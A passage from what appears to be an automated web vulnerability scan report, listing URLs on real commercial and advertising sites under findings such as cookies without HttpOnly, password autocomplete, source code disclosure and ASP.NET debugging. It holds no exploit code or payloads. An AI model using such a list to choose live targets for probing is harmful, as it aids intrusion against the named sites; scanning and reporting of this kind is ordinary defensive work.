12.55. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.56. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.57. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.58. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.59. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.60. http://rt.legolas-media.com/lgrt

12.61. http://search.spotxchange.com/track/tag/6382.1008/img

12.62. http://server.iad.liveperson.net/hc/52793056/

12.63. http://services.krxd.net/geoip

12.64. http://services.krxd.net/pixel.gif

12.65. http://tags.bluekai.com/site/3834

12.66. http://www.actonsoftware.com/acton/bn/1227/visitor.gif

12.67. http://www.bizographics.com/collect/

12.68. http://www.marykay.com/

12.69. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg

12.70. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_makeupartist.jpg

12.71. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg

12.72. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_twrandr.jpg

12.73. http://www.marykay.com/Common/SiteCatalyst/marykaycom/s_code.js

12.74. http://www.marykay.com/Content/HPflash/245_eyeColorBundle.swf

12.75. http://www.marykay.com/Content/HPflash/254_makeUpArtistLooks.swf

12.76. http://www.marykay.com/Content/HPflash/324m_shopYourWay.swf

12.77. http://www.marykay.com/Content/HPflash/330m_%20FallTrend_eng.swf

12.78. http://www.marykay.com/Content/HPflash/373_TWNightCmpx.swf

12.79. http://www.marykay.com/Content/HPflash/502_mascaraWardrobe.swf

12.80. http://www.marykay.com/Content/HPflash/502_moc.swf

12.81. http://www.marykay.com/Content/HPflash/BoaB_miniAd.swf

12.82. http://www.marykay.com/IMAGES/bkgLong.gif

12.83. http://www.marykay.com/Images/Checkout/viewbag/btn_x.png

12.84. http://www.marykay.com/Images/Site/FooterBack1.gif

12.85. http://www.marykay.com/Images/Site/hdottedline.gif

12.86. http://www.marykay.com/Images/Site/searchbox.gif

12.87. http://www.marykay.com/Images/Site/vdottedline.gif

12.88. http://www.marykay.com/Images/Site/wholeheader.jpg

12.89. http://www.marykay.com/JS/swfobject.js

12.90. http://www.marykay.com/Menu.css

12.91. http://www.marykay.com/Scripts/HeaderScript.js

12.92. http://www.marykay.com/Scripts/jquery-1.4.2.min.js

12.93. http://www.marykay.com/Styles.css

12.94. http://www.marykay.com/Styles_US.css

12.95. http://www.marykay.com/Themes/TabMenu/US/tabs.css

12.96. http://www.marykay.com/Themes/TabMenu/tabs.js

12.97. http://www.marykay.com/content/HPflash/portfolio_mk.xml

12.98. http://www.marykay.com/content/hpflash/stage.swf

12.99. http://www.marykay.com/default.aspx

12.100. http://www.marykay.com/favicon.ico

12.101. http://www.marykay.com/images/fflogo.jpg

12.102. http://www.marykay.com/images/icn_ec.jpg

12.103. http://www.marykay.com/images/icn_fb.jpg

12.104. http://www.marykay.com/images/icn_pbp.jpg

12.105. http://www.marykay.com/images/icn_vmo.jpg

12.106. http://www.marykay.com/images/icn_yt.jpg

12.107. http://www.marykay.com/images/ielogo.jpg

12.108. http://www.marykay.com/images/searchbutton.gif

12.109. http://www.marykay.com/scripts/i2a.js

13. Cookie without HttpOnly flag set

13.1. http://afe.specificclick.net/

13.2. http://afe.specificclick.net/serve/v=5

13.3. http://blog.harbottle.com/dm/xmlrpc.php

13.4. http://convctr.overture.com/images/cc/cc.gif

13.5. http://data.cnbc.com/quotes

13.6. https://forums.oracle.com/forums/adfAuthentication

13.7. https://forums.oracle.com/forums/category.jspa

13.8. https://forums.oracle.com/forums/guestsettings!default.jspa

13.9. https://forums.oracle.com/forums/index.jspa

13.10. https://forums.oracle.com/forums/login!withRedirect.jspa

13.11. https://forums.oracle.com/forums/main.jspa

13.12. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard

13.13. http://pg.links.origin.channelintelligence.com/pages/wl.asp

13.14. http://pg.links.origin.channelintelligence.com/pages/wl.asp

13.15. http://pg.links.origin.channelintelligence.com/pages/wl.asp

13.16. http://pixel.adsafeprotected.com/jspix

13.17. http://pixel.everesttech.net/1688/i

13.18. https://register.cnbc.com/forgotPassword.do

13.19. https://register.cnbc.com/memberCenter.do

13.20. https://register.cnbc.com/registerUser.do

13.21. http://search.oracle.com/search/search

13.22. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

13.23. http://ttwbs.channelintelligence.com/

13.24. http://www.atg.com/svc-common/script/propertyFunc.js.jsp

13.25. http://a.tribalfusion.com/displayAd.js

13.26. http://a.tribalfusion.com/i.cid

13.27. http://a.tribalfusion.com/j.ad

13.28. http://a.tribalfusion.com/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html

13.29. http://a.tribalfusion.com/z/i.cid

13.30. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/**

13.31. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1182.iframe.120x60/**

13.32. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/**

13.33. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/**

13.34. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1209.iframe.120x60/**

13.35. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/**

13.36. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.721.iframe.120x60/**

13.37. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534**

13.38. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**

13.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154**

13.40. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**

13.41. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**

13.42. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**

13.43. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**

13.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**

13.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005**

13.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**

13.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**

13.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**

13.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**

13.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321534**

13.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321844**

13.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322154**

13.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322464**

13.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322772**

13.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323080**

13.56. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323388**

13.57. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323696**

13.58. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324005**

13.59. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324313**

13.60. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324623**

13.61. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324934**

13.62. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315325243**

13.63. http://ad.yieldmanager.com/pixel

13.64. http://ads.pointroll.com/PortalServe/

13.65. http://ads.rnmd.net/getAds

13.66. http://api.bizographics.com/v1/profile.redirect

13.67. http://api.twitter.com/1/statuses/user_timeline.json

13.68. http://b.scorecardresearch.com/b

13.69. http://c.statcounter.com/t.php

13.70. http://clk.fetchback.com/serve/fb/click

13.71. http://clk.fetchback.com/serve/fb/engmnt

13.72. http://d.adroll.com/check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/4X7ERY5MVFDBLHMTRJRP2G

13.73. http://d.adroll.com/check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/RFYZ2NEPUVBUFENBCOH6GL

13.74. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO

13.75. http://d.ads.readwriteweb.com/ck.php

13.76. http://d.ads.readwriteweb.com/spc.php

13.77. http://d1.openx.org/ck.php

13.78. http://developers.facebook.com/plugins/

13.79. http://education.oracle.com/cgi-bin/shopcart/viewcart.cgi

13.80. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage

13.81. http://imp.fetchback.com/serve/fb/adtag.js

13.82. http://imp.fetchback.com/serve/fb/imp

13.83. http://lct.salesforce.com/sfga.js

13.84. http://legolas.nexac.com/lgalt

13.85. https://login.cnbc.com/cas/logout

13.86. https://login.oracle.com/favicon.ico

13.87. https://login.oracle.com/mysso/signon.jsp

13.88. https://login.oracle.com/mysso/sso_loginui/b-bg.gif

13.89. https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif

13.90. https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif

13.91. https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif

13.92. https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif

13.93. https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif

13.94. https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif

13.95. https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif

13.96. https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif

13.97. https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif

13.98. https://login.oracle.com/mysso/sso_loginui/loginStyling.css

13.99. https://login.oracle.com/mysso/sso_loginui/moc_lib.js

13.100. https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif

13.101. https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif

13.102. https://login.oracle.com/mysso/sso_loginui/red-b-l.gif

13.103. https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif

13.104. https://login.oracle.com/mysso/sso_loginui/red-b-r.gif

13.105. https://login.oracle.com/mysso/sso_loginui/sso_check.js

13.106. https://login.oracle.com/mysso/sso_loginui/t-bg.gif

13.107. https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif

13.108. https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif

13.109. https://login.oracle.com/oam/server/sso/auth_cred_submit

13.110. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

13.111. http://m1215.ic-live.com/522/

13.112. http://m1460.ic-live.com/586/

13.113. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard

13.114. http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1

13.115. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js

13.116. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js

13.117. http://optimized-by.rubiconproject.com/a/dk.html

13.118. http://optimized-by.rubiconproject.com/a/dk.js

13.119. http://oracle.112.2o7.net/b/ss/oracleopenworld,oraclecom,oracleglobal/1/H.23.3/s09989644403103

13.120. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140

13.121. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845

13.122. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499

13.123. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388

13.124. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035

13.125. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025

13.126. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303

13.127. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569

13.128. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993

13.129. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862

13.130. http://p.brilig.com/contact/bct

13.131. http://pi.pardot.com/analytics

13.132. http://ping.crowdscience.com/ping.js

13.133. http://pixel.fetchback.com/serve/fb/pdc

13.134. http://pixel.quantserve.com/pixel

13.135. http://public.deloitte.com/media/00Global/social_links/dtt_email_16x16.gif

13.136. http://r.openx.net/img

13.137. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

13.138. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

13.139. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

13.140. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

13.141. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

13.142. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

13.143. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

13.144. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

13.145. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

13.146. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

13.147. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

13.148. http://register.cnbc.com/forgotPassword.do

13.149. http://register.cnbc.com/forgotpassword1.jsp

13.150. https://register.cnbc.com/

13.151. https://register.cnbc.com/RandomImage.jsp

13.152. https://register.cnbc.com/cas

13.153. https://register.cnbc.com/checkemail.do

13.154. https://register.cnbc.com/checkpassword.do

13.155. https://register.cnbc.com/checkscreenname.do

13.156. https://register.cnbc.com/checkzipcode.do

13.157. https://register.cnbc.com/createUser.do

13.158. https://register.cnbc.com/css/forgotPassword.css

13.159. https://register.cnbc.com/css/member_center_sytles.css

13.160. https://register.cnbc.com/css/newRegistration.css

13.161. https://register.cnbc.com/css/registration.css

13.162. https://register.cnbc.com/email/EmailSupport.jsp

13.163. https://register.cnbc.com/favicon.ico

13.164. https://register.cnbc.com/forgotPassword1.do

13.165. https://register.cnbc.com/forgotpassword1.jsp

13.166. https://register.cnbc.com/images/clickToContinue.gif

13.167. https://register.cnbc.com/images/loaderImage.gif

13.168. https://register.cnbc.com/images/memberCenterHeader.jpg

13.169. https://register.cnbc.com/images/submitPreferences.jpg

13.170. https://register.cnbc.com/images/tick.jpg

13.171. https://register.cnbc.com/images/tile_02.gif

13.172. https://register.cnbc.com/images/wrong.jpg

13.173. https://register.cnbc.com/js/membercenter.js

13.174. https://register.cnbc.com/js/prototype_ajax.js

13.175. https://register.cnbc.com/js/registrationBasic.js

13.176. https://register.cnbc.com/js/registrationUtils.js

13.177. https://register.cnbc.com/js/registrationValidations.js

13.178. https://register.cnbc.com/js/s_code.js

13.179. https://register.cnbc.com/js/validation.js

13.180. https://register.cnbc.com/quote-html-webservice/fvquote.htm

13.181. https://register.cnbc.com/quote-html-webservice/quote.htm

13.182. https://register.cnbc.com/refreshlogin.jsp

13.183. http://rt.legolas-media.com/lgrt

13.184. http://search.spotxchange.com/track/tag/6382.1008/img

13.185. http://server.iad.liveperson.net/hc/52793056/

13.186. http://services.krxd.net/geoip

13.187. http://services.krxd.net/pixel.gif

13.188. http://sophelle.app5.hubspot.com/salog.js.aspx

13.189. http://statse.webtrendslive.com/dcscnww13100008eg8v7k3x39_3j3x/dcs.gif

13.190. http://t2.trackalyzer.com/trackalyze.asp

13.191. http://t5.trackalyzer.com/trackalyze.asp

13.192. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

13.193. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf

13.194. http://tags.bluekai.com/site/3834

13.195. http://tenzing.fmpub.net/

13.196. http://ticker.cnbc.com/

13.197. http://www.actonsoftware.com/acton/bn/1227/visitor.gif

13.198. http://www.bizographics.com/collect/

13.199. http://www.cnbc.com/

13.200. http://www.cnbc.com/id/15837856

13.201. http://www.cnbc.com/id/15837856/site/14081545/

13.202. http://www.cnbc.com/id/15838394

13.203. http://www.cnbc.com/id/15839263/

13.204. http://www.cnbc.com/pointrollads.htm

13.205. http://www.csc.com/cybersecurity/contact_us

13.206. http://www.csc.com/search

13.207. http://www.csc.com/services

13.208. http://www.csc.com/utils/live_search

13.209. http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp

13.210. http://www.gillettevenus.com/en_US/products/refillables/embrace/index.jsp

13.211. http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp

13.212. http://www.gillettevenus.com/en_US/razor_finder/index.jsp

13.213. http://www.gillettevenus.com/en_US/search/index.jsp

13.214. http://www.googleadservices.com/pagead/aclk

13.215. http://www.marykay.com/

13.216. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg

13.217. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_makeupartist.jpg

13.218. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg

13.219. http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_twrandr.jpg

13.220. http://www.marykay.com/Common/SiteCatalyst/marykaycom/s_code.js

13.221. http://www.marykay.com/Content/HPflash/245_eyeColorBundle.swf

13.222. http://www.marykay.com/Content/HPflash/254_makeUpArtistLooks.swf

13.223. http://www.marykay.com/Content/HPflash/324m_shopYourWay.swf

13.224. http://www.marykay.com/Content/HPflash/330m_%20FallTrend_eng.swf

13.225. http://www.marykay.com/Content/HPflash/373_TWNightCmpx.swf

13.226. http://www.marykay.com/Content/HPflash/502_mascaraWardrobe.swf

13.227. http://www.marykay.com/Content/HPflash/502_moc.swf

13.228. http://www.marykay.com/Content/HPflash/BoaB_miniAd.swf

13.229. http://www.marykay.com/IMAGES/bkgLong.gif

13.230. http://www.marykay.com/Images/Checkout/viewbag/btn_x.png

13.231. http://www.marykay.com/Images/Site/FooterBack1.gif

13.232. http://www.marykay.com/Images/Site/hdottedline.gif

13.233. http://www.marykay.com/Images/Site/searchbox.gif

13.234. http://www.marykay.com/Images/Site/vdottedline.gif

13.235. http://www.marykay.com/Images/Site/wholeheader.jpg

13.236. http://www.marykay.com/JS/swfobject.js

13.237. http://www.marykay.com/Menu.css

13.238. http://www.marykay.com/Scripts/HeaderScript.js

13.239. http://www.marykay.com/Scripts/jquery-1.4.2.min.js

13.240. http://www.marykay.com/Styles.css

13.241. http://www.marykay.com/Styles_US.css

13.242. http://www.marykay.com/Themes/TabMenu/US/tabs.css

13.243. http://www.marykay.com/Themes/TabMenu/tabs.js

13.244. http://www.marykay.com/content/HPflash/portfolio_mk.xml

13.245. http://www.marykay.com/content/hpflash/stage.swf

13.246. http://www.marykay.com/default.aspx

13.247. http://www.marykay.com/favicon.ico

13.248. http://www.marykay.com/images/fflogo.jpg

13.249. http://www.marykay.com/images/icn_ec.jpg

13.250. http://www.marykay.com/images/icn_fb.jpg

13.251. http://www.marykay.com/images/icn_pbp.jpg

13.252. http://www.marykay.com/images/icn_vmo.jpg

13.253. http://www.marykay.com/images/icn_yt.jpg

13.254. http://www.marykay.com/images/ielogo.jpg

13.255. http://www.marykay.com/images/searchbutton.gif

13.256. http://www.marykay.com/scripts/i2a.js

13.257. http://www.sapient.com/en-us/about-sapient/alliances.html

13.258. http://www.sapient.com/en-us/about-sapient/alliances/atg.html

13.259. http://www.sapient.com/en-us/about-sapient/corporate-social-responsibility.html

13.260. http://www.sapient.com/en-us/search.html

13.261. http://www.tenzing.com/atg-ecommerce-hosting.asp

13.262. http://www2.znode.com/analytics

14. Password field with autocomplete enabled

14.1. https://bugzilla.mozilla.org/show_bug.cgi

14.2. https://bugzilla.mozilla.org/show_bug.cgi

14.3. http://digg.com/submit

14.4. https://login.cnbc.com/cas/login

14.5. https://login.cnbc.com/cas/login

14.6. https://login.cnbc.com/cas/login

14.7. https://login.cnbc.com/cas/login

14.8. https://oracleus.wingateweb.com/portal/newreg.ww

14.9. https://register.cnbc.com/createUser.do

14.10. https://register.cnbc.com/registerUser.do

14.11. https://www.atg.com/service/main.jsp

14.12. http://www.bigcommerce.com/freetrial.php

14.13. https://www.bigcommerce.com/login.php

14.14. https://www.cvs.com/CVSApp/user/login.jsp

14.15. http://www.fetchback.com/

14.16. http://www.oraclecfo.com/Authentication/Login_w.html

14.17. http://www.oraclecfo.com/Main/Home/Home_w.html

14.18. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html

14.19. http://www.shopify.com/login

15. Source code disclosure

15.1. http://blogs.oracle.com/otn/resource/1OTN-2col/OTNHead-Short.png

15.2. http://platform.linkedin.com/js/nonSecureAnonymousFramework

15.3. http://reviews.fekkai.com/module/5113/cmn/5113redes/display.pkg.js

15.4. http://reviews.gillettevenus.com/module/4746/cmn/4746/display.pkg.js

15.5. http://search.oracle.com/search/search

15.6. http://www.cvs.com/CVSApp/js/functions.js

15.7. https://www.cvs.com/CVSApp/js/functions.js

15.8. https://www.cvs.com/CVSApp/js/userprofile.js

15.9. http://www.dove.us/Resources/JS/dove.js

15.10. http://www.netsuite.com/portal/javascript/NLPortal.js

16. ASP.NET debugging enabled

16.1. http://services.plymedia.com/Default.aspx

16.2. http://www.oraclecfo.com/Default.aspx

16.3. http://www.znode.com/Default.aspx

17. Referer-dependent response

17.1. http://a.tribalfusion.com/j.ad

17.2. http://api.bizographics.com/v1/profile.json

17.3. http://c.brightcove.com/services/viewer/federated_f9

17.4. https://login.oracle.com/mysso/signon.jsp

17.5. http://use.typekit.com/k/ghj6ovz-d.css

17.6. http://www.facebook.com/plugins/like.php

17.7. http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php

17.8. http://www.harbottle.com/hnl/pages/articles/direct_beauty_products_trimsole.php

17.9. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html

17.10. http://www.youtube.com/v/JWMKXb1Guq4

18. Cross-domain POST

18.1. http://education.oracle.com/education/netcall/talk_to_us_ca.html

18.2. http://education.oracle.com/education/netcall/talk_to_us_us.html

18.3. http://www.readwriteweb.com/enterprise/2010/11/oracle.php

18.4. http://www.sophelle.com/Contact-Us/

18.5. http://www.sophelle.com/Products/CQ/free-trial.html

19. Cross-domain Referer leakage

19.1. http://a.tribalfusion.com/j.ad

19.2. http://a248.e.akamai.net/www.volusion.com/a1/js/js_all_min01.js

19.3. https://account.bigcommerce.com/cart.php

19.4. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.38

19.5. http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2

19.6. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

19.7. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

19.8. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

19.9. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

19.10. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

19.11. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

19.12. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

19.13. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

19.14. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

19.15. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus

19.16. http://ad.doubleclick.net/adj/nbcu.cnbc/search

19.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**

19.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**

19.19. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**

19.20. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**

19.21. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**

19.22. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**

19.23. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**

19.24. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**

19.25. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**

19.26. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**

19.27. http://ads.adsonar.com/adserving/getAds.jsp

19.28. http://ads.pointroll.com/PortalServe/

19.29. http://afe.specificclick.net/serve/v=5

19.30. http://afe.specificclick.net/serve/v=5

